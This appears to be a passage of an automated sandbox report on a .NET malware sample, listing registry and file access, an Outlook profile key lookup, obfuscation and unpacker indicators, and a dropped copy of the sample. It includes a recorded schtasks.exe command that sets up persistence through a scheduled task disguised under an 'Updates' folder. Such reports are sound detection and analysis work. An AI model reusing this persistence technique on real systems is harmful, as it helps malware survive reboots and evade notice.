                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                        Source: LisectAVT_2403002A_16.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                        Source: LisectAVT_2403002A_16.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: LisectAVT_2403002A_16.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                        Source: Binary string: FPzK.pdb source: LisectAVT_2403002A_16.exe, NxmtwwVGOtEdjd.exe.0.dr
                        Source: Binary string: FPzK.pdbSHA256 source: LisectAVT_2403002A_16.exe, NxmtwwVGOtEdjd.exe.0.dr

                        Data Obfuscation

                        barindex
                        .NET source code contains potential unpacker
                        Source: 0.2.LisectAVT_2403002A_16.exe.7b90000.8.raw.unpack, ioHoB3xyTTvGj5kpgh.cs.Net Code: MWmr0l58sc System.Reflection.Assembly.Load(byte[])
                        Source: 0.2.LisectAVT_2403002A_16.exe.56e0000.6.raw.unpack, wehuuoKhMKMbnQu72K.cs.Net Code: LOPk5OGwQvvejRfJl7n System.Reflection.Assembly.Load(byte[])
                        Source: 0.2.LisectAVT_2403002A_16.exe.2eb44ec.2.raw.unpack, wehuuoKhMKMbnQu72K.cs.Net Code: LOPk5OGwQvvejRfJl7n System.Reflection.Assembly.Load(byte[])
                        Source: 0.2.LisectAVT_2403002A_16.exe.422d070.3.raw.unpack, ioHoB3xyTTvGj5kpgh.cs.Net Code: MWmr0l58sc System.Reflection.Assembly.Load(byte[])
                        Source: LisectAVT_2403002A_16.exeStatic PE information: 0xFEADA566 [Tue May 26 14:55:34 2105 UTC]
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeCode function: 0_2_01304779 push esi; iretd 0_2_0130477A
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeCode function: 0_2_0130477B push ebp; iretd 0_2_01304782
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeCode function: 0_2_013047B1 push esi; iretd 0_2_013047B2
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeCode function: 0_2_013046B8 push edx; iretd 0_2_013046BA
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeCode function: 0_2_013046BB push edx; iretd 0_2_013046C2
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeCode function: 0_2_0130AD27 pushfd ; iretd 0_2_0130AD2A
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeCode function: 0_2_0130AD2B pushfd ; iretd 0_2_0130AD32
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeCode function: 0_2_05A88248 pushad ; iretd 0_2_05A88251
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeCode function: 9_2_0668FCEF push ss; iretd 9_2_0668FCF0
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeCode function: 9_2_0668FCAF push ss; iretd 9_2_0668FCBD
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeCode function: 10_2_07952520 push dword ptr [esi+5D906B4Fh]; ret 10_2_07952573
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeCode function: 10_2_07958248 pushad ; iretd 10_2_07958251
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeCode function: 15_2_06308627 pushad ; iretd 15_2_06308635
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeCode function: 15_2_06305CA0 pushfd ; iretd 15_2_06305CAD
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeCode function: 15_2_06303D5F push es; ret 15_2_06303D70
                        Source: LisectAVT_2403002A_16.exeStatic PE information: section name: .text entropy: 7.613224313381159
                        Source: NxmtwwVGOtEdjd.exe.0.drStatic PE information: section name: .text entropy: 7.613224313381159
                        Source: 0.2.LisectAVT_2403002A_16.exe.7b90000.8.raw.unpack, j9YWqGoNkeAufjqtfr.csHigh entropy of concatenated method names: 'SwVBC7ZCD1', 'jhUBUErGuT', 'bffBomOKCf', 'W4uBflm9Px', 'UEjBMaa25b', 'MPCBNmn75V', 'Ig1B9KdYih', 'OsrBLCjqaJ', 'wsXBRXOfsc', 'FleBgTAvaX'
                        Source: 0.2.LisectAVT_2403002A_16.exe.7b90000.8.raw.unpack, ioHoB3xyTTvGj5kpgh.csHigh entropy of concatenated method names: 'G9ndk8TnsG', 'jg3dZIJEHi', 'LjBdVa96e6', 'njPd8sy7Bo', 'kxQda3li6Z', 'ktdd2esIcl', 'JrRdebPBPP', 'a9edxPJqAd', 'Pfjd1MdnoS', 'CxUdIT8csT'
                        Source: 0.2.LisectAVT_2403002A_16.exe.7b90000.8.raw.unpack, WEkvyEiPg4exp1JWJr.csHigh entropy of concatenated method names: 'PZc8DdvK17', 'l9p87q38HQ', 'j5W8ExCVDC', 'gV68igLBCF', 'KsN8BH6Ooe', 'NcJ8QB2txh', 'iyL8s6pMM1', 'qVj8cTJkLf', 'g8086nvp58', 'krU8GwMf5Z'
                        Source: 0.2.LisectAVT_2403002A_16.exe.7b90000.8.raw.unpack, rbl15J4iXuiF3yd9Pd.csHigh entropy of concatenated method names: 'jOI63gVPXi', 'n296d5fH6H', 'Ul06rRK1yH', 'CMM6ZfhKG5', 'X5f6VZ7J6u', 'RES6aFvqWa', 'YxO621gL0n', 'evMcn1TQak', 'AhgcAtQIsF', 'WfYc5Ak4NU'
                        Source: 0.2.LisectAVT_2403002A_16.exe.7b90000.8.raw.unpack, Icw0P7E5I25dt8WiCY.csHigh entropy of concatenated method names: 'Gk3Vojd3xF', 'UpXVfsYioH', 'W48VHS9vLY', 'H5RVj2QvDd', 'rsNVSgaler', 'bw3VuusPrG', 'xqWVn6ipha', 'C8kVAN9vCL', 'ehcV5kxvk1', 'QXSV4KGidN'
                        Source: 0.2.LisectAVT_2403002A_16.exe.7b90000.8.raw.unpack, XwoIjq3XxNvPNWGVI52.csHigh entropy of concatenated method names: 'S9I6quAppn', 'JlE6PcGTqv', 'SpB60KOY5L', 'qjP6DTT0Do', 'xvT6FBq7tV', 'vsK67TUO69', 'KE46ykTPUU', 'xK26Ei4Otb', 'Jov6irQGiN', 'Aal6mlCDlR'
                        Source: 0.2.LisectAVT_2403002A_16.exe.7b90000.8.raw.unpack, OPdVgnRx7UCY8cpdFo.csHigh entropy of concatenated method names: 'TfZ2HWlAL0', 'CDH2jiyDlM', 'PsY2SKfM56', 'ToString', 'nRi2uMGmfV', 'mGS2ns9kQw', 'VW1wfe4cQXhE4QS8t0q', 'gIuVL14qtxlhqLcSKme', 'V9HCGv4MNGDARBt7yYF'
                        Source: 0.2.LisectAVT_2403002A_16.exe.7b90000.8.raw.unpack, iKYG0MmubIw9OVMBtg.csHigh entropy of concatenated method names: 'NfWaFrMeCy', 'ocvayym4Vb', 'Qxt8NPGEbw', 'bge89L9aFL', 'FrV8L75enC', 'nCK8RO97jH', 'y8H8gXfMji', 'cgq8l6SElR', 'KXV8wZV4Ij', 'J1J8CpPc5G'
                        Source: 0.2.LisectAVT_2403002A_16.exe.7b90000.8.raw.unpack, BAqoVNzExaAeveETi0.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'nGt6KZD8kW', 'B2m6Bd1g5G', 'x5b6QwrK0C', 'l186sOqVHA', 'KWC6c28yta', 'S1x660KrN3', 'qx36G2ePrT'
                        Source: 0.2.LisectAVT_2403002A_16.exe.7b90000.8.raw.unpack, owyQps3JsOel92LKCfT.csHigh entropy of concatenated method names: 'yyPGquyU4J', 'HOBGPMb2R8', 'fbcG0exi88', 'm4Xi4D0WUGYwl2iwreo', 'PuZ1ee0GpkK7MHMmbUx', 'kDh9Ln0LiWLB6pRTekC', 'zlLPV70uhF5v6O9SMMp', 'MWOUVt0zq9CgoKTPbNF'
                        Source: 0.2.LisectAVT_2403002A_16.exe.7b90000.8.raw.unpack, lvrY9n9k7lkh9Cl70l.csHigh entropy of concatenated method names: 'dyU2vNq71H', 'bRk2qHAGtX', 'Qpn20Ie8IK', 'Dil2DQptVJ', 'y1k27iNsb5', 'imx2yTZCEx', 'CPt2ivNXMG', 'iO42m3uRWh', 'PlRYxG4EB672Ssut5jP', 's5Cqvv4dQVZ9udH5QQS'
                        Source: 0.2.LisectAVT_2403002A_16.exe.7b90000.8.raw.unpack, CrVdkuWHH6itGcKud7.csHigh entropy of concatenated method names: 'cs42ktJLwq', 'L0R2Vd9YmN', 'j2c2apgiGR', 'FVi2eCaI7X', 'F2X2x6jpsg', 'oSOaSIiBMG', 'lmtauUo0RN', 'fHFann456d', 'EG4aAj3BkZ', 'FVaa5gAE3p'
                        Source: 0.2.LisectAVT_2403002A_16.exe.7b90000.8.raw.unpack, TNI5rOjXvELxKJP6Fj.csHigh entropy of concatenated method names: 'CfksIuq50j', 'kvuspBFKxM', 'ToString', 'dR8sZa01jf', 'oBSsVBpPcp', 'EDos8Jm6MH', 'W6YsaP3s3U', 'lG5s2hT04B', 'FJ5seKuLH4', 'bJ9sxIrLJu'
                        Source: 0.2.LisectAVT_2403002A_16.exe.7b90000.8.raw.unpack, dMt11SJRe8APP9s2WL.csHigh entropy of concatenated method names: 'DfW0LGWf8', 'yl0DiW3Mk', 'XO87wDb8b', 'ljCyYh3ms', 'buqi4rcbN', 'ipvmXVMfp', 'TVQXYPh1C0sAYF3Uxd', 'UlSnaZ81YHSEFdtVni', 'pOZMDMIS6fcFdyJc9P', 'RA0cppkBm'
                        Source: 0.2.LisectAVT_2403002A_16.exe.7b90000.8.raw.unpack, QG7R5hgsvLbIepY6MR.csHigh entropy of concatenated method names: 'Qp9eZZB71w', 'sLGe8FrGFy', 'X5we2jcUuR', 'nDr24KU9Ms', 'itR2zuHXIZ', 'niXeXg3iOh', 'gk6e3O0EKL', 'iDleJWGD9X', 'OjiedqZRku', 'mGQeruVZC1'
                        Source: 0.2.LisectAVT_2403002A_16.exe.7b90000.8.raw.unpack, vVZlyfwE6D6VO1P3fu.csHigh entropy of concatenated method names: 'IS6eqWM1UO', 'aqqePdd4Ww', 'dQoe0qsNj8', 'ucbeDX7HC8', 'NcGeFZ58HE', 'SYRe7ktiZp', 'GRkey9vBMa', 'eMmeEgpjoi', 'gfueiotCx9', 'Rd3em2EVjB'
                        Source: 0.2.LisectAVT_2403002A_16.exe.7b90000.8.raw.unpack, yp7P2SryFTLLqPCLLF.csHigh entropy of concatenated method names: 'S393ecw0P7', 'YI23x5dt8W', 'EPg3I4exp1', 'cWJ3pr2KYG', 'gMB3Btg7rV', 'dku3QHH6it', 'Tga5uvB9jYMQHAFdI2', 'YHSRAKNCSCobJVmv0l', 'K1c331286p', 'zrj3dLrk18'
                        Source: 0.2.LisectAVT_2403002A_16.exe.7b90000.8.raw.unpack, WTyLNRuTreLPB4U01m.csHigh entropy of concatenated method names: 'CQMsApFQ0g', 'OGIs4PsFeP', 'QdAcXpX1b3', 'fPmc3asCCe', 'haUsTyBEYH', 'Y1DsUeR6fJ', 'XpssbgB0KU', 'yOSsoK7bGf', 'MMcsfgZliF', 'dC8sH0qY0s'
                        Source: 0.2.LisectAVT_2403002A_16.exe.7b90000.8.raw.unpack, NpB9h6VafMhAx1WsJp.csHigh entropy of concatenated method names: 'Dispose', 'AJi35vDi97', 'BTHJMf9HMs', 'tAuccFwjJ9', 'IHh34UJHEi', 'Hv53zFuv68', 'ProcessDialogKey', 'niWJXfxvCg', 'V7eJ31vJQV', 'AXCJJcbl15'
                        Source: 0.2.LisectAVT_2403002A_16.exe.7b90000.8.raw.unpack, ShUJHEAiMv5Fuv68Ki.csHigh entropy of concatenated method names: 'reicZxmOIa', 'mVrcVTteJu', 'qkxc8Byeb0', 'yDEca2XNs6', 'S2lc22ZKj2', 'uv5ceGNQjL', 'pwhcxLYg6y', 'VfLc1iJT7L', 'CkXcI4I5TX', 'DUdcpuyU5N'
                        Source: 0.2.LisectAVT_2403002A_16.exe.7b90000.8.raw.unpack, z2DRmH3drgXDZwPhdrF.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'VciGoABM39', 'wm2GfLRJ7I', 'UqgGHbEgff', 'vfPGjQqj3q', 'uVRGS29YT5', 'HeOGu5CcVi', 'C0oGnAM5Qv'
                        Source: 0.2.LisectAVT_2403002A_16.exe.7b90000.8.raw.unpack, yWjIbkbFk9uQinWgPH.csHigh entropy of concatenated method names: 'PGbKEHongF', 'qe7KiRBmqH', 'PmCKW3fLEF', 'qaFKMKqOke', 'IddK9nSrCj', 'qPnKLVpZk7', 'mk2KgF0FaP', 'TyJKlLtkL3', 'XUwKCXwIjQ', 'F3GKThIsTt'
                        Source: 0.2.LisectAVT_2403002A_16.exe.7b90000.8.raw.unpack, GfxvCg5n7e1vJQVDXC.csHigh entropy of concatenated method names: 'B66cWq08vZ', 'PjOcMQSOoJ', 'HENcNl88o6', 'bKEc9YpV10', 'lgtcoGe4TI', 'UsNcLkoHPf', 'Next', 'Next', 'Next', 'NextBytes'
                        Source: 0.2.LisectAVT_2403002A_16.exe.56e0000.6.raw.unpack, kdFvaMFVPKs73pA7Ae.csHigh entropy of concatenated method names: 'jlLbsIppcp4pe', 'HUDVafGQx3A5lYPXEbC', 'bWxlDPGFKtjOUjq8ME9', 'J13JY7Gs9VegMR0Usdn', 'gjnvHYGCPTFBSN5sXDA', 'UXn9pRGVr5JYGFjuCRJ', 'g8bQ3yGYPoLwrRusK3E', 'KwwAwLG5jtFVjgr5V0l', 'lJyLiGG0wAjthymuVo5', 'KrHGd2G9wj507LdZGDe'
                        Source: 0.2.LisectAVT_2403002A_16.exe.56e0000.6.raw.unpack, DD.csHigh entropy of concatenated method names: 'wgRxinKHcbWANUbFNm', 'dwveif1E9jqp4XTbTA', 'iYTXHL2SDoNZBJVsGw', 'hFySdn3keDBvJSvKal', 'PVIytPpWpuEYQLk40u'
                        Source: 0.2.LisectAVT_2403002A_16.exe.56e0000.6.raw.unpack, ihWImL1h2qjtIkVYDh.csHigh entropy of concatenated method names: 'qJUttacKFT', 'djwp7oGHZ8xfNf3m5ut', 'AZqALCG67UykKuowXP2', 'dkLCJpGlCfFdqtD7Epf', 'iHWSkAGjDuGN31hXJsT', 'u4UYnDGE5xCOMnt15QR', 'jhES7Va4c', 'jWmROKkjL', 'Dispose', 'BJj7gBhfp'
                        Source: 0.2.LisectAVT_2403002A_16.exe.56e0000.6.raw.unpack, oImfMJtvGUo8fMQNBQ.csHigh entropy of concatenated method names: 'cxsORewNJ', 'VvrninWuk', 'ustvIxt9o', 'QtXoY7g0N', 'cMKlMbnQu', 'w2KLAB5Xx', 'hNkF6TG2YCh7xU8s3hJ', 'hs4l1PGKtLhAeRnm1c4', 'Dispose', 'MoveNext'
                        Source: 0.2.LisectAVT_2403002A_16.exe.56e0000.6.raw.unpack, wehuuoKhMKMbnQu72K.csHigh entropy of concatenated method names: 'NXMyxc8eI', 'GTZadPHeP', 'DEVNaDCj9', 'cflmBNqev', 'VFQ0OImLC', 'PbYVMxZvt', 'UPdFjbLed', 'AeEi93ui9', 'oM66buTLn', 'nxFUIfcfn'
                        Source: 0.2.LisectAVT_2403002A_16.exe.2eb44ec.2.raw.unpack, kdFvaMFVPKs73pA7Ae.csHigh entropy of concatenated method names: 'jlLbsIppcp4pe', 'HUDVafGQx3A5lYPXEbC', 'bWxlDPGFKtjOUjq8ME9', 'J13JY7Gs9VegMR0Usdn', 'gjnvHYGCPTFBSN5sXDA', 'UXn9pRGVr5JYGFjuCRJ', 'g8bQ3yGYPoLwrRusK3E', 'KwwAwLG5jtFVjgr5V0l', 'lJyLiGG0wAjthymuVo5', 'KrHGd2G9wj507LdZGDe'
                        Source: 0.2.LisectAVT_2403002A_16.exe.2eb44ec.2.raw.unpack, DD.csHigh entropy of concatenated method names: 'wgRxinKHcbWANUbFNm', 'dwveif1E9jqp4XTbTA', 'iYTXHL2SDoNZBJVsGw', 'hFySdn3keDBvJSvKal', 'PVIytPpWpuEYQLk40u'
                        Source: 0.2.LisectAVT_2403002A_16.exe.2eb44ec.2.raw.unpack, ihWImL1h2qjtIkVYDh.csHigh entropy of concatenated method names: 'qJUttacKFT', 'djwp7oGHZ8xfNf3m5ut', 'AZqALCG67UykKuowXP2', 'dkLCJpGlCfFdqtD7Epf', 'iHWSkAGjDuGN31hXJsT', 'u4UYnDGE5xCOMnt15QR', 'jhES7Va4c', 'jWmROKkjL', 'Dispose', 'BJj7gBhfp'
                        Source: 0.2.LisectAVT_2403002A_16.exe.2eb44ec.2.raw.unpack, oImfMJtvGUo8fMQNBQ.csHigh entropy of concatenated method names: 'cxsORewNJ', 'VvrninWuk', 'ustvIxt9o', 'QtXoY7g0N', 'cMKlMbnQu', 'w2KLAB5Xx', 'hNkF6TG2YCh7xU8s3hJ', 'hs4l1PGKtLhAeRnm1c4', 'Dispose', 'MoveNext'
                        Source: 0.2.LisectAVT_2403002A_16.exe.2eb44ec.2.raw.unpack, wehuuoKhMKMbnQu72K.csHigh entropy of concatenated method names: 'NXMyxc8eI', 'GTZadPHeP', 'DEVNaDCj9', 'cflmBNqev', 'VFQ0OImLC', 'PbYVMxZvt', 'UPdFjbLed', 'AeEi93ui9', 'oM66buTLn', 'nxFUIfcfn'
                        Source: 0.2.LisectAVT_2403002A_16.exe.422d070.3.raw.unpack, j9YWqGoNkeAufjqtfr.csHigh entropy of concatenated method names: 'SwVBC7ZCD1', 'jhUBUErGuT', 'bffBomOKCf', 'W4uBflm9Px', 'UEjBMaa25b', 'MPCBNmn75V', 'Ig1B9KdYih', 'OsrBLCjqaJ', 'wsXBRXOfsc', 'FleBgTAvaX'
                        Source: 0.2.LisectAVT_2403002A_16.exe.422d070.3.raw.unpack, ioHoB3xyTTvGj5kpgh.csHigh entropy of concatenated method names: 'G9ndk8TnsG', 'jg3dZIJEHi', 'LjBdVa96e6', 'njPd8sy7Bo', 'kxQda3li6Z', 'ktdd2esIcl', 'JrRdebPBPP', 'a9edxPJqAd', 'Pfjd1MdnoS', 'CxUdIT8csT'
                        Source: 0.2.LisectAVT_2403002A_16.exe.422d070.3.raw.unpack, WEkvyEiPg4exp1JWJr.csHigh entropy of concatenated method names: 'PZc8DdvK17', 'l9p87q38HQ', 'j5W8ExCVDC', 'gV68igLBCF', 'KsN8BH6Ooe', 'NcJ8QB2txh', 'iyL8s6pMM1', 'qVj8cTJkLf', 'g8086nvp58', 'krU8GwMf5Z'
                        Source: 0.2.LisectAVT_2403002A_16.exe.422d070.3.raw.unpack, rbl15J4iXuiF3yd9Pd.csHigh entropy of concatenated method names: 'jOI63gVPXi', 'n296d5fH6H', 'Ul06rRK1yH', 'CMM6ZfhKG5', 'X5f6VZ7J6u', 'RES6aFvqWa', 'YxO621gL0n', 'evMcn1TQak', 'AhgcAtQIsF', 'WfYc5Ak4NU'
                        Source: 0.2.LisectAVT_2403002A_16.exe.422d070.3.raw.unpack, Icw0P7E5I25dt8WiCY.csHigh entropy of concatenated method names: 'Gk3Vojd3xF', 'UpXVfsYioH', 'W48VHS9vLY', 'H5RVj2QvDd', 'rsNVSgaler', 'bw3VuusPrG', 'xqWVn6ipha', 'C8kVAN9vCL', 'ehcV5kxvk1', 'QXSV4KGidN'
                        Source: 0.2.LisectAVT_2403002A_16.exe.422d070.3.raw.unpack, XwoIjq3XxNvPNWGVI52.csHigh entropy of concatenated method names: 'S9I6quAppn', 'JlE6PcGTqv', 'SpB60KOY5L', 'qjP6DTT0Do', 'xvT6FBq7tV', 'vsK67TUO69', 'KE46ykTPUU', 'xK26Ei4Otb', 'Jov6irQGiN', 'Aal6mlCDlR'
                        Source: 0.2.LisectAVT_2403002A_16.exe.422d070.3.raw.unpack, OPdVgnRx7UCY8cpdFo.csHigh entropy of concatenated method names: 'TfZ2HWlAL0', 'CDH2jiyDlM', 'PsY2SKfM56', 'ToString', 'nRi2uMGmfV', 'mGS2ns9kQw', 'VW1wfe4cQXhE4QS8t0q', 'gIuVL14qtxlhqLcSKme', 'V9HCGv4MNGDARBt7yYF'
                        Source: 0.2.LisectAVT_2403002A_16.exe.422d070.3.raw.unpack, iKYG0MmubIw9OVMBtg.csHigh entropy of concatenated method names: 'NfWaFrMeCy', 'ocvayym4Vb', 'Qxt8NPGEbw', 'bge89L9aFL', 'FrV8L75enC', 'nCK8RO97jH', 'y8H8gXfMji', 'cgq8l6SElR', 'KXV8wZV4Ij', 'J1J8CpPc5G'
                        Source: 0.2.LisectAVT_2403002A_16.exe.422d070.3.raw.unpack, BAqoVNzExaAeveETi0.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'nGt6KZD8kW', 'B2m6Bd1g5G', 'x5b6QwrK0C', 'l186sOqVHA', 'KWC6c28yta', 'S1x660KrN3', 'qx36G2ePrT'
                        Source: 0.2.LisectAVT_2403002A_16.exe.422d070.3.raw.unpack, owyQps3JsOel92LKCfT.csHigh entropy of concatenated method names: 'yyPGquyU4J', 'HOBGPMb2R8', 'fbcG0exi88', 'm4Xi4D0WUGYwl2iwreo', 'PuZ1ee0GpkK7MHMmbUx', 'kDh9Ln0LiWLB6pRTekC', 'zlLPV70uhF5v6O9SMMp', 'MWOUVt0zq9CgoKTPbNF'
                        Source: 0.2.LisectAVT_2403002A_16.exe.422d070.3.raw.unpack, lvrY9n9k7lkh9Cl70l.csHigh entropy of concatenated method names: 'dyU2vNq71H', 'bRk2qHAGtX', 'Qpn20Ie8IK', 'Dil2DQptVJ', 'y1k27iNsb5', 'imx2yTZCEx', 'CPt2ivNXMG', 'iO42m3uRWh', 'PlRYxG4EB672Ssut5jP', 's5Cqvv4dQVZ9udH5QQS'
                        Source: 0.2.LisectAVT_2403002A_16.exe.422d070.3.raw.unpack, CrVdkuWHH6itGcKud7.csHigh entropy of concatenated method names: 'cs42ktJLwq', 'L0R2Vd9YmN', 'j2c2apgiGR', 'FVi2eCaI7X', 'F2X2x6jpsg', 'oSOaSIiBMG', 'lmtauUo0RN', 'fHFann456d', 'EG4aAj3BkZ', 'FVaa5gAE3p'
                        Source: 0.2.LisectAVT_2403002A_16.exe.422d070.3.raw.unpack, TNI5rOjXvELxKJP6Fj.csHigh entropy of concatenated method names: 'CfksIuq50j', 'kvuspBFKxM', 'ToString', 'dR8sZa01jf', 'oBSsVBpPcp', 'EDos8Jm6MH', 'W6YsaP3s3U', 'lG5s2hT04B', 'FJ5seKuLH4', 'bJ9sxIrLJu'
                        Source: 0.2.LisectAVT_2403002A_16.exe.422d070.3.raw.unpack, dMt11SJRe8APP9s2WL.csHigh entropy of concatenated method names: 'DfW0LGWf8', 'yl0DiW3Mk', 'XO87wDb8b', 'ljCyYh3ms', 'buqi4rcbN', 'ipvmXVMfp', 'TVQXYPh1C0sAYF3Uxd', 'UlSnaZ81YHSEFdtVni', 'pOZMDMIS6fcFdyJc9P', 'RA0cppkBm'
                        Source: 0.2.LisectAVT_2403002A_16.exe.422d070.3.raw.unpack, QG7R5hgsvLbIepY6MR.csHigh entropy of concatenated method names: 'Qp9eZZB71w', 'sLGe8FrGFy', 'X5we2jcUuR', 'nDr24KU9Ms', 'itR2zuHXIZ', 'niXeXg3iOh', 'gk6e3O0EKL', 'iDleJWGD9X', 'OjiedqZRku', 'mGQeruVZC1'
                        Source: 0.2.LisectAVT_2403002A_16.exe.422d070.3.raw.unpack, vVZlyfwE6D6VO1P3fu.csHigh entropy of concatenated method names: 'IS6eqWM1UO', 'aqqePdd4Ww', 'dQoe0qsNj8', 'ucbeDX7HC8', 'NcGeFZ58HE', 'SYRe7ktiZp', 'GRkey9vBMa', 'eMmeEgpjoi', 'gfueiotCx9', 'Rd3em2EVjB'
                        Source: 0.2.LisectAVT_2403002A_16.exe.422d070.3.raw.unpack, yp7P2SryFTLLqPCLLF.csHigh entropy of concatenated method names: 'S393ecw0P7', 'YI23x5dt8W', 'EPg3I4exp1', 'cWJ3pr2KYG', 'gMB3Btg7rV', 'dku3QHH6it', 'Tga5uvB9jYMQHAFdI2', 'YHSRAKNCSCobJVmv0l', 'K1c331286p', 'zrj3dLrk18'
                        Source: 0.2.LisectAVT_2403002A_16.exe.422d070.3.raw.unpack, WTyLNRuTreLPB4U01m.csHigh entropy of concatenated method names: 'CQMsApFQ0g', 'OGIs4PsFeP', 'QdAcXpX1b3', 'fPmc3asCCe', 'haUsTyBEYH', 'Y1DsUeR6fJ', 'XpssbgB0KU', 'yOSsoK7bGf', 'MMcsfgZliF', 'dC8sH0qY0s'
                        Source: 0.2.LisectAVT_2403002A_16.exe.422d070.3.raw.unpack, NpB9h6VafMhAx1WsJp.csHigh entropy of concatenated method names: 'Dispose', 'AJi35vDi97', 'BTHJMf9HMs', 'tAuccFwjJ9', 'IHh34UJHEi', 'Hv53zFuv68', 'ProcessDialogKey', 'niWJXfxvCg', 'V7eJ31vJQV', 'AXCJJcbl15'
                        Source: 0.2.LisectAVT_2403002A_16.exe.422d070.3.raw.unpack, ShUJHEAiMv5Fuv68Ki.csHigh entropy of concatenated method names: 'reicZxmOIa', 'mVrcVTteJu', 'qkxc8Byeb0', 'yDEca2XNs6', 'S2lc22ZKj2', 'uv5ceGNQjL', 'pwhcxLYg6y', 'VfLc1iJT7L', 'CkXcI4I5TX', 'DUdcpuyU5N'
                        Source: 0.2.LisectAVT_2403002A_16.exe.422d070.3.raw.unpack, z2DRmH3drgXDZwPhdrF.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'VciGoABM39', 'wm2GfLRJ7I', 'UqgGHbEgff', 'vfPGjQqj3q', 'uVRGS29YT5', 'HeOGu5CcVi', 'C0oGnAM5Qv'
                        Source: 0.2.LisectAVT_2403002A_16.exe.422d070.3.raw.unpack, yWjIbkbFk9uQinWgPH.csHigh entropy of concatenated method names: 'PGbKEHongF', 'qe7KiRBmqH', 'PmCKW3fLEF', 'qaFKMKqOke', 'IddK9nSrCj', 'qPnKLVpZk7', 'mk2KgF0FaP', 'TyJKlLtkL3', 'XUwKCXwIjQ', 'F3GKThIsTt'
                        Source: 0.2.LisectAVT_2403002A_16.exe.422d070.3.raw.unpack, GfxvCg5n7e1vJQVDXC.csHigh entropy of concatenated method names: 'B66cWq08vZ', 'PjOcMQSOoJ', 'HENcNl88o6', 'bKEc9YpV10', 'lgtcoGe4TI', 'UsNcLkoHPf', 'Next', 'Next', 'Next', 'NextBytes'
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeFile created: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeJump to dropped file

                        Boot Survival

                        barindex
                        Uses schtasks.exe or at.exe to add and modify task schedules
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NxmtwwVGOtEdjd" /XML "C:\Users\user\AppData\Local\Temp\tmpB5CB.tmp"

                        Hooking and other Techniques for Hiding and Protection

                        barindex
                        Loading BitLocker PowerShell Module
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
